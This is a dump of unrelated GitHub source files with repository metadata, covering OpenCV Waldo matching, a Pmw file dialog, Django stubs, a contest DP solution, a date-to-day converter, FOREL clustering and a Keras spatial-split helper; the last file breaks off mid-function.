ap.add_argument("-w", "--waldo", required = True,
help = "Path to the waldo image")
args = vars(ap.parse_args())
puzzle = cv2.imread('find_waldo.jpg')
img_gray = cv2.cvtColor(puzzle, cv2.COLOR_BGR2GRAY)
waldo = cv2.imread('waldo.png',0)
# store width and height
w, h = waldo.shape[::-1]
res = cv2.matchTemplate(img_gray,waldo,cv2.TM_CCOEFF_NORMED)
threshold = 0.6
# finding values exceeding threshold
loc = np.where( res >= threshold)
for pt in zip(*loc[::-1]):
#draw rectangle on places where it exceeds threshold
cv2.rectangle(puzzle, pt, (pt[0] + w, pt[1] + h), (0,255,0), 2)
cv2.imshow("Puzzle", imutils.resize(puzzle, height = 650))
cv2.waitKey(0)
# Offer to make Waldo more clear
user_input = input("Press 1 if your having trouble seeing Waldo \n")
user_int_put = int(user_input)
if user_int_put == 1:
puzzle = cv2.imread(args["puzzle"])
waldo = cv2.imread(args["waldo"])
(wHeight, wWidth) = waldo.shape[:2]
#find the waldo in the puzzle
result = cv2.matchTemplate(puzzle, waldo, cv2.TM_CCOEFF)
(_, _, minLoc, maxLoc) = cv2.minMaxLoc(result)
# the puzzle image
topLeft = maxLoc
botRight = (topLeft[0] + wWidth, topLeft[1] + wHeight)
roi = puzzle[topLeft[1]:botRight[1], topLeft[0]:botRight[0]]
# construct a darkened transparent 'layer' to darken everything
# in the puzzle except for waldo
mask = np.zeros(puzzle.shape, dtype = "uint8")
puzzle = cv2.addWeighted(puzzle, 0.25, mask, 0.75, 0)
# put the original waldo back in the image so that he is
# 'brighter' than the rest of the image
puzzle[topLeft[1]:botRight[1], topLeft[0]:botRight[0]] = roi
# display the images
cv2.imshow("Puzzle", imutils.resize(puzzle, height = 650))
cv2.waitKey(0)
| [
"noreply@github.com"
] | andrewcunningham33.noreply@github.com |
25e0f060c6bbb381ef0adce82ef475fb49accea2 | 7a23870e9b0b56b112f634d26760282ff7a4f46c | /Projects/Archived Tk code/From extensions folder/Pmw/Pmw_1_3/contrib/PmwFileDialog.py | b11001ca1e80505bdb49d27b9cd04f81218da196 | [] | no_license | leo-editor/leo-editor-contrib | 0c671998c4ec7fd7c4ce890a201395afe340481b | 28c22721e1bc313c120a8a6c288893bc566a5c67 | refs/heads/master | 2023-06-25T04:28:54.520792 | 2023-06-14T20:18:12 | 2023-06-14T20:18:12 | 16,771,641 | 6 | 6 | null | 2023-06-09T11:26:42 | 2014-02-12T15:28:36 | Python | UTF-8 | Python | false | false | 14,836 | py | #
__version__ = '$Id: PmwFileDialog.py,v 1.1 2007/12/13 16:06:01 edream Exp $'
#
# Filename dialogs using Pmw
#
# (C) Rob W.W. Hooft, Nonius BV, 1998
#
# Modifications:
#
# J. Willem M. Nissink, Cambridge Crystallographic Data Centre, 8/2002
# Added optional information pane at top of dialog; if option
# 'info' is specified, the text given will be shown (in blue).
# Modified example to show both file and directory-type dialog
#
# No Guarantees. Distribute Freely.
# Please send bug-fixes/patches/features to <r.hooft@euromail.com>
#
################################################################################
import os,fnmatch,time
import Tkinter,Pmw
#Pmw.setversion("0.8.5")
def _errorpop(master,text):
d=Pmw.MessageDialog(master,
title="Error",
message_text=text,
buttons=("OK",))
d.component('message').pack(ipadx=15,ipady=15)
d.activate()
d.destroy()
class PmwFileDialog(Pmw.Dialog):
"""File Dialog using Pmw"""
def __init__(self, parent = None, **kw):
# Define the megawidget options.
optiondefs = (
('filter', '*', self.newfilter),
('directory', os.getcwd(), self.newdir),
('filename', '', self.newfilename),
('historylen',10, None),
('command', None, None),
('info', None, None),
)
self.defineoptions(kw, optiondefs)
# Initialise base class (after defining options).
Pmw.Dialog.__init__(self, parent)
self.withdraw()
# Create the components.
interior = self.interior()
if self['info'] is not None:
rowoffset=1
dn = self.infotxt()
dn.grid(row=0,column=0,columnspan=2,padx=3,pady=3)
else:
rowoffset=0
dn = self.mkdn()
dn.grid(row=0+rowoffset,column=0,columnspan=2,padx=3,pady=3)
del dn
# Create the directory list component.
dnb = self.mkdnb()
dnb.grid(row=1+rowoffset,column=0,sticky='news',padx=3,pady=3)
del dnb
# Create the filename list component.
fnb = self.mkfnb()
fnb.grid(row=1+rowoffset,column=1,sticky='news',padx=3,pady=3)
del fnb
# Create the filter entry
ft = self.mkft()
ft.grid(row=2+rowoffset,column=0,columnspan=2,padx=3,pady=3)
del ft
# Create the filename entry
fn = self.mkfn()
fn.grid(row=3+rowoffset,column=0,columnspan=2,padx=3,pady=3)
fn.bind('<Return>',self.okbutton)
del fn
# Buttonbox already exists
bb=self.component('buttonbox')
bb.add('OK',command=self.okbutton)
bb.add('Cancel',command=self.cancelbutton)
del bb
Pmw.alignlabels([self.component('filename'),
self.component('filter'),
self.component('dirname')])
def infotxt(self):
""" Make information block component at the top """
return self.createcomponent(
'infobox',
(), None,
Tkinter.Label, (self.interior(),),
width=51,
relief='groove',
foreground='darkblue',
justify='left',
text=self['info']
)
def mkdn(self):
"""Make directory name component"""
return self.createcomponent(
'dirname',
(), None,
Pmw.ComboBox, (self.interior(),),
entryfield_value=self['directory'],
entryfield_entry_width=40,
entryfield_validate=self.dirvalidate,
selectioncommand=self.setdir,
labelpos='w',
label_text='Directory:')
def mkdnb(self):
"""Make directory name box"""
return self.createcomponent(
'dirnamebox',
(), None,
Pmw.ScrolledListBox, (self.interior(),),
label_text='directories',
labelpos='n',
hscrollmode='none',
dblclickcommand=self.selectdir)
def mkft(self):
"""Make filter"""
return self.createcomponent(
'filter',
(), None,
Pmw.ComboBox, (self.interior(),),
entryfield_value=self['filter'],
entryfield_entry_width=40,
selectioncommand=self.setfilter,
labelpos='w',
label_text='Filter:')
def mkfnb(self):
"""Make filename list box"""
return self.createcomponent(
'filenamebox',
(), None,
Pmw.ScrolledListBox, (self.interior(),),
label_text='files',
labelpos='n',
hscrollmode='none',
selectioncommand=self.singleselectfile,
dblclickcommand=self.selectfile)
def mkfn(self):
"""Make file name entry"""
return self.createcomponent(
'filename',
(), None,
Pmw.ComboBox, (self.interior(),),
entryfield_value=self['filename'],
entryfield_entry_width=40,
entryfield_validate=self.filevalidate,
selectioncommand=self.setfilename,
labelpos='w',
label_text='Filename:')
def dirvalidate(self,string):
if os.path.isdir(string):
return Pmw.OK
else:
return Pmw.PARTIAL
def filevalidate(self,string):
if string=='':
return Pmw.PARTIAL
elif os.path.isfile(string):
return Pmw.OK
elif os.path.exists(string):
return Pmw.PARTIAL
else:
return Pmw.OK
def okbutton(self):
"""OK action: user thinks he has input valid data and wants to
proceed. This is also called by <Return> in the filename entry"""
fn=self.component('filename').get()
self.setfilename(fn)
if self.validate(fn):
self.canceled=0
self.deactivate()
def cancelbutton(self):
"""Cancel the operation"""
self.canceled=1
self.deactivate()
def tidy(self,w,v):
"""Insert text v into the entry and at the top of the list of
the combobox w, remove duplicates"""
if not v:
return
entry=w.component('entry')
entry.delete(0,'end')
entry.insert(0,v)
list=w.component('scrolledlist')
list.insert(0,v)
index=1
while index<list.index('end'):
k=list.get(index)
if k==v or index>self['historylen']:
list.delete(index)
else:
index=index+1
w.checkentry()
def setfilename(self,value):
if not value:
return
value=os.path.join(self['directory'],value)
dir,fil=os.path.split(value)
self.configure(directory=dir,filename=value)
c=self['command']
if callable(c):
c()
def newfilename(self):
"""Make sure a newly set filename makes it into the combobox list"""
self.tidy(self.component('filename'),self['filename'])
def setfilter(self,value):
self.configure(filter=value)
def newfilter(self):
"""Make sure a newly set filter makes it into the combobox list"""
self.tidy(self.component('filter'),self['filter'])
self.fillit()
def setdir(self,value):
self.configure(directory=value)
def newdir(self):
"""Make sure a newly set dirname makes it into the combobox list"""
self.tidy(self.component('dirname'),self['directory'])
self.fillit()
def singleselectfile(self):
"""Single click in file listbox. Move file to "filename" combobox"""
cs=self.component('filenamebox').curselection()
if cs!=():
value=self.component('filenamebox').get(cs)
self.setfilename(value)
def selectfile(self):
"""Take the selected file from the filename, normalize it, and OK"""
self.singleselectfile()
value=self.component('filename').get()
self.setfilename(value)
if value:
self.okbutton()
def selectdir(self):
"""Take selected directory from the dirnamebox into the dirname"""
cs=self.component('dirnamebox').curselection()
if cs!=():
value=self.component('dirnamebox').get(cs)
dir=self['directory']
if not dir:
dir=os.getcwd()
if value:
if value=='..':
dir=os.path.split(dir)[0]
else:
dir=os.path.join(dir,value)
self.configure(directory=dir)
self.fillit()
def askfilename(self,directory=None,filter=None):
"""The actual client function. Activates the dialog, and
returns only after a valid filename has been entered
(return value is that filename) or when canceled (return
value is None)"""
if directory!=None:
self.configure(directory=directory)
if filter!=None:
self.configure(filter=filter)
self.fillit()
self.canceled=1 # Needed for when user kills dialog window
self.activate()
if self.canceled:
return None
else:
return self.component('filename').get()
lastdir=""
lastfilter=None
lasttime=0
def fillit(self):
"""Get the directory list and show it in the two listboxes"""
# Do not run unnecesarily
if self.lastdir==self['directory'] and self.lastfilter==self['filter'] and self.lasttime>os.stat(self.lastdir)[8]:
return
self.lastdir=self['directory']
self.lastfilter=self['filter']
self.lasttime=time.time()
dir=self['directory']
if not dir:
dir=os.getcwd()
dirs=['..']
files=[]
try:
fl=os.listdir(dir)
fl.sort()
except os.error,arg:
if arg[0] in (2,20):
return
raise
for f in fl:
if os.path.isdir(os.path.join(dir,f)):
dirs.append(f)
else:
filter=self['filter']
if not filter:
filter='*'
if fnmatch.fnmatch(f,filter):
files.append(f)
self.component('filenamebox').setlist(files)
self.component('dirnamebox').setlist(dirs)
def validate(self,filename):
"""Validation function. Should return 1 if the filename is valid,
0 if invalid. May pop up dialogs to tell user why. Especially
suited to subclasses: i.e. only return 1 if the file does/doesn't
exist"""
return 1
class PmwDirDialog(PmwFileDialog):
"""Directory Dialog using Pmw"""
def __init__(self, parent = None, **kw):
# Define the megawidget options.
optiondefs = (
('directory', os.getcwd(), self.newdir),
('historylen',10, None),
('command', None, None),
('info', None, None),
)
self.defineoptions(kw, optiondefs)
# Initialise base class (after defining options).
Pmw.Dialog.__init__(self, parent)
self.withdraw()
# Create the components.
interior = self.interior()
if self['info'] is not None:
rowoffset=1
dn = self.infotxt()
dn.grid(row=0,column=0,columnspan=2,padx=3,pady=3)
else:
rowoffset=0
dn = self.mkdn()
dn.grid(row=1+rowoffset,column=0,columnspan=2,padx=3,pady=3)
dn.bind('<Return>',self.okbutton)
del dn
# Create the directory list component.
dnb = self.mkdnb()
dnb.grid(row=0+rowoffset,column=0,columnspan=2,sticky='news',padx=3,pady=3)
del dnb
# Buttonbox already exists
bb=self.component('buttonbox')
bb.add('OK',command=self.okbutton)
bb.add('Cancel',command=self.cancelbutton)
del bb
lastdir=""
def fillit(self):
"""Get the directory list and show it in the two listboxes"""
# Do not run unnecesarily
if self.lastdir==self['directory']:
return
self.lastdir=self['directory']
dir=self['directory']
if not dir:
dir=os.getcwd()
dirs=['..']
try:
fl=os.listdir(dir)
fl.sort()
except os.error,arg:
if arg[0] in (2,20):
return
raise
for f in fl:
if os.path.isdir(os.path.join(dir,f)):
dirs.append(f)
self.component('dirnamebox').setlist(dirs)
def okbutton(self):
"""OK action: user thinks he has input valid data and wants to
proceed. This is also called by <Return> in the dirname entry"""
fn=self.component('dirname').get()
self.configure(directory=fn)
if self.validate(fn):
self.canceled=0
self.deactivate()
def askfilename(self,directory=None):
"""The actual client function. Activates the dialog, and
returns only after a valid filename has been entered
(return value is that filename) or when canceled (return
value is None)"""
if directory!=None:
self.configure(directory=directory)
self.fillit()
self.activate()
if self.canceled:
return None
else:
return self.component('dirname').get()
def dirvalidate(self,string):
if os.path.isdir(string):
return Pmw.OK
elif os.path.exists(string):
return Pmw.PARTIAL
else:
return Pmw.OK
def validate(self,filename):
"""Validation function. Should return 1 if the filename is valid,
0 if invalid. May pop up dialogs to tell user why. Especially
suited to subclasses: i.e. only return 1 if the file does/doesn't
exist"""
if filename=='':
_errorpop(self.interior(),"Empty filename")
return 0
if os.path.isdir(filename) or not os.path.exists(filename):
return 1
else:
_errorpop(self.interior(),"This is not a directory")
return 0
class PmwExistingFileDialog(PmwFileDialog):
def filevalidate(self,string):
if os.path.isfile(string):
return Pmw.OK
else:
return Pmw.PARTIAL
def validate(self,filename):
if os.path.isfile(filename):
return 1
elif os.path.exists(filename):
_errorpop(self.interior(),"This is not a plain file")
return 0
else:
_errorpop(self.interior(),"Please select an existing file")
return 0
class PmwExistingDirDialog(PmwDirDialog):
def dirvalidate(self,string):
if os.path.isdir(string):
return Pmw.OK
else:
return Pmw.PARTIAL
def validate(self,filename):
if os.path.isdir(filename):
return 1
elif os.path.exists(filename):
_errorpop(self.interior(),"This is not a directory")
return 0
else:
_errorpop(self.interior(),"Please select an existing directory")
if __name__=="__main__":
root=Tkinter.Tk()
root.withdraw()
Pmw.initialise()
f0=PmwFileDialog(root)
f0.title('File name dialog')
n=f0.askfilename()
print '\nFilename : ',repr(n),'\n'
f1=PmwDirDialog(root,info='This is a directory dialog')
f1.title('Directory name dialog')
while 1:
n=f1.askfilename()
if n is None:
break
print "Dirname : ",repr(n)
| [
"edreamleo@gmail.com"
] | edreamleo@gmail.com |
69b6c313d154bab481291751409ec6d20fb06afe | 1c8530ab4bbc6c4f842f374b623eb32f1e7670b1 | /App/PomApp/apps.py | 268a68f35a8029010500812df059c85d41d53425 | [] | no_license | moon05/pomodoro_todoList | 81aa5908c265e7f703b3cd924967b1201ba5a59f | d2417ecfb30041c924e53b7bac36744c1313801c | refs/heads/master | 2021-01-01T05:24:06.670644 | 2016-05-17T18:14:52 | 2016-05-17T18:14:52 | 57,882,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | from __future__ import unicode_literals
from django.apps import AppConfig
class PomappConfig(AppConfig):
name = 'PomApp'
| [
"amamun@u.rochester.edu"
] | amamun@u.rochester.edu |
efa55d788ff68fe0cf919b7a45220e24baccb822 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_25489.py | 0e0cbd91234b9936d47833c2c46fd67b71ab0056 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | # y = 3 (#This is not a comment)
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
28b09522528bf2b49286473587332a3dea34ab4d | ba626e194e510cca0e0f52fb61b565522f129504 | /blog/basicapp/admin.py | 538bc1945ac946aac1b6086f66c0cda68009131c | [] | no_license | arungarg14/BLOG-DJANGO | f0e66d425dfb390c065f2198b1a2b595322cd6f0 | 4a5f322b7a4ffb9438c9ffec0eb4b1af288ca924 | refs/heads/master | 2022-01-05T04:37:36.631073 | 2019-06-05T10:01:15 | 2019-06-05T10:01:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | from django.contrib import admin
from basicapp.models import Post,Comment
# Register your models here.
admin.site.register(Post)
admin.site.register(Comment)
| [
"arungarg1414@gmail.com"
] | arungarg1414@gmail.com |
b9c35bacbba1122e7bf5ad1531e085007384e51a | f023692f73992354a0b7823d9c49ae730c95ab52 | /AtCoderRegularContest/132/C.py | 3e94b88d37560e4a0f7c839099cf78a2907fed1a | [] | no_license | corutopi/AtCorder_python | a959e733f9a3549fab7162023e414ac2c99c4abe | a2c78cc647076071549e354c398155a65d5e331a | refs/heads/master | 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 | Python | UTF-8 | Python | false | false | 1,979 | py | """
解説AC
変則dp
"""
# import sys
# sys.setrecursionlimit(10 ** 6)
# # for pypy
# import pypyjit
# pypyjit.set_param('max_unroll_recursion=-1')
# import bisect
# from collections import deque
# import string
from math import ceil, floor
inf = float('inf')
mod = 10 ** 9 + 7
mod2 = 998244353
# from decorator import stop_watch
#
#
# @stop_watch
def solve(N, D, A):
A = [i for i in range(D)] + [a + D - 1 if a != -1 else a for a in A] + \
[N + D + i for i in range(D)]
used = [0] * len(A)
for a in A:
used[a] = 1 if a != -1 else used[a]
dp = [0] * 2 ** (2 * D + 1)
dp[(1 << (D + 1)) - 1] = 1
for i in range(D, N + D):
dp_new = [0] * 2 ** (2 * D + 1)
for j in range(2 ** (2 * D + 1)):
# i - D - 1 が使用されていないケースはスキップ
# ここで枝刈りしておかないとpythonだと間に合わない
if not j & 1: continue
if A[i] != -1:
# 数字が固定されている場合
if not (j >> (A[i] - i + D + 1) & 1):
tmp = j >> 1 | 1 << (A[i] - i + D)
dp_new[tmp] += dp[j]
dp_new[tmp] %= mod2
else:
# 固定されていない(-1)の場合
for k in range(2 * D + 1):
if used[i + k - D]: continue # 使用済みの数字は使えない
if not (j >> (k + 1)) & 1:
tmp = j >> 1 | 1 << k
dp_new[tmp] += dp[j]
dp_new[tmp] %= mod2
dp = dp_new
print(sum(dp))
if __name__ == '__main__':
# S = input()
# N = int(input())
N, D = map(int, input().split())
A = [int(i) for i in input().split()]
solve(N, D, A)
# # test
# from random import randint
# import string
# import tool.testcase as tt
# from tool.testcase import random_str, random_ints
# solve()
| [
"39874652+corutopi@users.noreply.github.com"
] | 39874652+corutopi@users.noreply.github.com |
069869c1802fa40cf5d5a5437907958a0bfa9e2d | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/list/nonNegativeInteger/Schema+Instance/NISTXML-SV-IV-list-nonNegativeInteger-enumeration-3-1.py | 0a96f1ef465b374d9e5d0791ff5bc20220dcdd83 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 695 | py | from output.models.nist_data.list_pkg.non_negative_integer.schema_instance.nistschema_sv_iv_list_non_negative_integer_enumeration_3_xsd.nistschema_sv_iv_list_non_negative_integer_enumeration_3 import NistschemaSvIvListNonNegativeIntegerEnumeration3
from output.models.nist_data.list_pkg.non_negative_integer.schema_instance.nistschema_sv_iv_list_non_negative_integer_enumeration_3_xsd.nistschema_sv_iv_list_non_negative_integer_enumeration_3 import NistschemaSvIvListNonNegativeIntegerEnumeration3Type
obj = NistschemaSvIvListNonNegativeIntegerEnumeration3(
value=NistschemaSvIvListNonNegativeIntegerEnumeration3Type.VALUE_693_7324_20_7475_4947489_80584759_9768357488_66469880_746558290
)
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
f0a01841cbcc2d97cfac73560a3bc1c1da27e906 | bebe6e9195dce6f47fe2f52a06ac85519ab969ac | /reverse_linked_list_3_pointer.py | 46ab8f6cce4bdfd720c819daefb65f082fd65761 | [] | no_license | jbobo/leetcode | f038ee934c4435a2f5a3e987b3d5b70b860a25e2 | 3894425256f8504f7c8f1903e47f670c6fa32a92 | refs/heads/master | 2022-11-05T07:19:48.897066 | 2020-06-24T01:20:25 | 2020-06-24T01:20:25 | 274,544,298 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,044 | py | #!/usr/bin/env python3
class ListNode:
def __init__(self, val, next=None):
self.val = val
self.next = next
def print_list(self):
pointer = self
print(pointer.val)
while pointer.next:
pointer = pointer.next
print(pointer.val)
def reverse_list(head):
lead_pointer = None
mid_pointer = head
trail_pointer = None
while mid_pointer:
# stash the next element
lead_pointer = mid_pointer.next
# set the mid pointer to the previous element
mid_pointer.next = trail_pointer
# previous is moved up to the current node
trail_pointer = mid_pointer
# update the current node from the stashed value
mid_pointer = lead_pointer
# lead_pointer = mid_pointer.next
return trail_pointer
if __name__ == "__main__":
test_list = ListNode("A", ListNode("B", ListNode("C", ListNode("D"))))
test_list.print_list()
reversed_list = reverse_list(test_list)
reversed_list.print_list()
| [
"nedbobo@Neds-MacBook-Pro.local"
] | nedbobo@Neds-MacBook-Pro.local |
77c42398c663140e51b3695cc0e08a4439cab5ed | a106fdc6041bd3484141d82838114e5908b1d6a2 | /lab12.py | 7ba10394a11392ce5079e517ff20562a39f082b7 | [] | no_license | cbailey234/gitlab | e04e134505da753e898a69b037377a384701ae7b | b7fca1e4b8035bf2bdc7dbd236f7d75a9fcd60ab | refs/heads/master | 2022-07-15T16:21:22.363501 | 2020-05-06T23:11:29 | 2020-05-06T23:11:29 | 260,273,852 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | from datetime import date
today = date.today()
print("Today's date:", today)
print("EE 250")
print("Chris Bailey")
| [
"cbailey234@yahoo.com"
] | cbailey234@yahoo.com |
1a1f7e2e20c9814a1a315e305fffb0ffc7a62585 | 07d3655c652d4a89e344c4bb0a3d63e8cb34288d | /forel.py | 214e1cf25e4958061c4c4b11fc3fdb88af6398ee | [] | no_license | tsolakghukasyan/FOREL-clustering | a621231f157738cdaf694cd75398f65202985414 | 180c1d4e693a5c94ee0a59e1bbc696d921a62886 | refs/heads/master | 2020-03-19T00:07:03.492902 | 2018-05-30T14:23:27 | 2018-05-30T14:23:27 | 135,454,265 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | import numpy as np
def cluster(points, radius, tol=1e-1):
centroids = []
while len(points) != 0:
current_point = get_random_point(points)
neighbors = get_neighbors(current_point, radius, points)
centroid = get_centroid(neighbors)
while np.linalg.norm(current_point - centroid) > tol:
current_point = centroid
neighbors = get_neighbors(current_point, radius, points)
centroid = get_centroid(neighbors)
points = remove_points(neighbors, points)
centroids.append(current_point)
return centroids
def get_neighbors(p, radius, points):
neighbors = [point for point in points if np.linalg.norm(p - point) < radius]
return np.array(neighbors)
def get_centroid(points):
return np.array([np.mean(points[:, 0]), np.mean(points[:, 1])])
def get_random_point(points):
random_index = np.random.choice(len(points), 1)[0]
return points[random_index]
def remove_points(subset, points):
points = [p for p in points if p not in subset]
return points
| [
"tsggukasyan@edu.hse.ru"
] | tsggukasyan@edu.hse.ru |
779a4db766d92b742db3f5ff015980bf64b76e20 | d4b5f42050b0eee01134afeef806956df60c9746 | /Date 2 Day Converter.py | 56044c0120e924e7268e0ba41afe3b9c8e3f2d67 | [] | no_license | touhidrahman/my_first_ever_codes | 007c5fc4c287a4144ed962148417c73265285ecf | a373e972e9f84d8cb8d9d982e0623dcd3d9a9a61 | refs/heads/master | 2021-04-15T09:01:17.302880 | 2018-03-23T22:42:38 | 2018-03-23T22:42:38 | 126,545,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,143 | py | """ DATE TO DAY CALCULATOR
Successful on 29 Feb 2012 - 1940 Hrs"""
def date2day(date):
"""This def converts date into flat day no. It adds leap year accordingly"""
x = date.split('-')
year = int(x[2])
month = int(x[1])
day = int(x[0])
if year % 4 == 0:
month_value = {0:0,
1:31,
2:31+29,
3:31+29+31,
4:31+29+31+30,
5:31+29+31+30+31,
6:31+29+31+30+31+30,
7:31+29+31+30+31+30+31,
8:31+29+31+30+31+30+31+31,
9:31+29+31+30+31+30+31+31+30,
10:31+29+31+30+31+30+31+31+30+31,
11:31+29+31+30+31+30+31+31+30+31+30,
12:31+29+31+30+31+30+31+31+30+31+30+31}
else:
month_value = {0:0,
1:31,
2:31+28,
3:31+28+31,
4:31+28+31+30,
5:31+28+31+30+31,
6:31+28+31+30+31+30,
7:31+28+31+30+31+30+31,
8:31+28+31+30+31+30+31+31,
9:31+28+31+30+31+30+31+31+30,
10:31+28+31+30+31+30+31+31+30+31,
11:31+28+31+30+31+30+31+31+30+31+30,
12:31+28+31+30+31+30+31+31+30+31+30+31}
day_of_yr = day + month_value.get(month - 1) #Get the value from dict
return day_of_yr
def yr_value(date):
"""Each yr starting from 1980 has got a value"""
x = date.split('-')
year = int(x[2])
yrs = []
for i in range(1980, year + 1, 4): #Here +1 is for counting the latest leapyear
if i % 4 == 0:
yrs.append(i)
leap_yr = len(yrs)
value_of_yr = leap_yr * 366 + (year - 1980 - leap_yr) * 365
return value_of_yr
def day_of_wk(value_of_yr, day_of_yr):
""" This function finds out the day out of year value"""
day_value = value_of_yr + day_of_yr
factor = day_value % 7
if factor == 0:
print('SUNDAY')
elif factor == 1:
print('MONDAY')
elif factor == 2:
print('TUESDAY')
elif factor == 3:
print('WEDNESDAY')
elif factor == 4:
print('THURSDAY')
elif factor == 5:
print('FRIDAY')
elif factor == 6:
print('SATURDAY')
def main():
date = input('Enter Date: ')
if date == 'exit':
exit()
elif date == 'help':
print("""
Type 'exit' to quit.
This calculator can
show day of dates
later than 1979.
""")
else:
b = date2day(date)
a = yr_value(date)
day_of_wk(a, b)
print("""
=======================
DATE TO DAY CALCULATOR
Version: 0.1
Touhidur Rahman
http://about.me/tanimkg
=======================
Enter any Date in this
format << dd-mm-yyyy >>
It will show the Day.
Type 'help' to get help
=======================
""")
while True:
main()
| [
"touhidrahman1987@gmail.com"
] | touhidrahman1987@gmail.com |
a99e5fd938668998f40d71595197fe4eabfea880 | 7cd36fa026bb922e438905819e97d7ed208dc49e | /examples/advanced/thinplate_morphing.py | d0515987197e12cfdcdd0e91e7e65d6ca9ab8b07 | [
"MIT"
] | permissive | lxychuanhai/vtkplotter | b267bfcbbee5c7733ac98f5327e311c9529c74b1 | bc1b8b8821095263a46bba20ca345cab1d70cc42 | refs/heads/master | 2020-11-25T15:25:33.597049 | 2019-12-17T18:49:05 | 2019-12-17T18:49:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 808 | py | """
Warp the tip of a mesh using Thin Plate Splines.
Red points stay fixed while a single point in space
moves as the arrow shows.
"""
from vtkplotter import *
mesh = load(datadir+"man.vtk").normalize()
meshd = mesh.clone().decimate(N=100) # a heavily decimated copy
sources = [[0.0, 1.0, 0.2]] # this point moves
targets = [[0.3, 1.3, 0.4]] # to this.
for pt in meshd.getPoints():
if pt[1] < 0.3: # these pts don't move
sources.append(pt) # source = target
targets.append(pt)
# calculate the warping T on the reduced mesh
T = thinPlateSpline(meshd, sources, targets).getTransform()
warp = mesh.clone().transformMesh(T).c("blue").alpha(0.4)
apts = Points(sources).c("red")
arro = Arrow(sources[0], targets[0])
show(mesh, arro, warp, apts, Text(__doc__), viewup="z", axes=1)
| [
"marco.musy@gmail.com"
] | marco.musy@gmail.com |
23e8fec245ac80d5a5ad58bdf2aad8d3e7bb5bd5 | 5e78e4eb81af0bbee63391b501cb771bbeb65d48 | /config.py | 0e18a1f8574a5a49a21a0a0b276bb1b2176ea695 | [] | no_license | ArvindRamachandran14/TAC-2.0 | 7479e451bcc3edb1360b42dbbccf313268a6be80 | 13c252c99be69f0f7c23c523ecd53e2707057b10 | refs/heads/master | 2023-03-20T08:09:21.930630 | 2021-03-09T06:58:00 | 2021-03-09T06:58:00 | 318,014,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | import json
class Config():
"""class that holds the PID parameters for humidity control loop"""
def __init__(self):
self.cfgFile = 'pH2O_PID.json'
self.cfg = json.load(open(self.cfgFile,'r'))
self.pH2O_P = self.cfg["pH2O_P"]
self.pH2O_I = self.cfg["pH2O_I"]
self.pH2O_D = self.cfg["pH2O_D"]
#print(pH2O_P, pH2O_I, pH2O_D)
def update(self):
"""funciton that updates the json file the current PID parameters for humidity control loop"""
self.cfg["pH2O_P"] = self.pH2O_P
self.cfg["pH2O_I"] = self.pH2O_I
self.cfg["pH2O_D"] = self.pH2O_D
with open(self.cfgFile, 'w') as fCfg:
json.dump(self.cfg, fCfg) | [
"aramac13@asu.edu"
] | aramac13@asu.edu |
1d94a7aaf0160f003ff3934bba18e8f21ae50052 | 69a576aa60918b3b846963da2238931468e354ab | /utils/spatial.py | 48c11f134472aad99921594a9b5bfddc25d536b5 | [] | no_license | parallel-ml/stand-alone | 3d04a31d442bf422d67d2f0a1f03eb04bdb841c7 | c86ce0d632188e9e16fb5539a7e2baed2c40ecdb | refs/heads/master | 2020-03-29T10:49:48.426742 | 2018-11-20T16:40:35 | 2018-11-20T16:40:35 | 149,824,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,044 | py | """
This module implements single Conv2D layer spatial split.
It provides an example of 2 division and another generalized
example. The arithmetic technique is discussed in 2 division
example.
"""
from keras.layers import Conv2D, Lambda, ZeroPadding2D
from keras.layers.merge import Concatenate
import keras.backend as K
import math
def split_xy(X, kernal, strides, padding, num):
""" A general function for split tensors with different shapes. """
# take care of padding here and set padding of conv always to be valid
if padding == 'same':
wk, hk = kernal
ws, hs = strides
_, W, H, _ = K.int_shape(X)
ow, oh = W / ws, H / hs
if W % ws != 0:
ow += 1
if H % hs != 0:
oh += 1
wp, hp = (ow - 1) * ws + wk - W, (oh - 1) * hs + hk - H
wp, hp = wp if wp >= 0 else 0, hp if hp >= 0 else 0
X = ZeroPadding2D(padding=((hp / 2, hp - hp / 2), (wp / 2, wp - wp / 2)))(X)
wk, hk = kernal
ws, hs = strides
_, W, H, _ = K.int_shape(X)
# output size
ow, oh = (W - wk) / ws + 1, (H - hk) / hs + 1
# calculate boundary for general chunk
wchunk, hchunk = ow / num, oh / num
rw, rh = (wchunk - 1) * ws + wk, (hchunk - 1) * hs + hk
# calculate special boundary for last chunk
wlchunk, hlchunk = ow - (num - 1) * wchunk, oh - (num - 1) * hchunk
lrw, lrh = (wlchunk - 1) * ws + wk, (hlchunk - 1) * hs + hk
offset = lambda kernals, strides, i: (kernals - strides) * i if kernals - strides > 0 else 0
# create a list of tuple with boundary (left, right, up, down)
boundary = []
for r in range(num):
for c in range(num):
if r == num - 1 and c == num - 1:
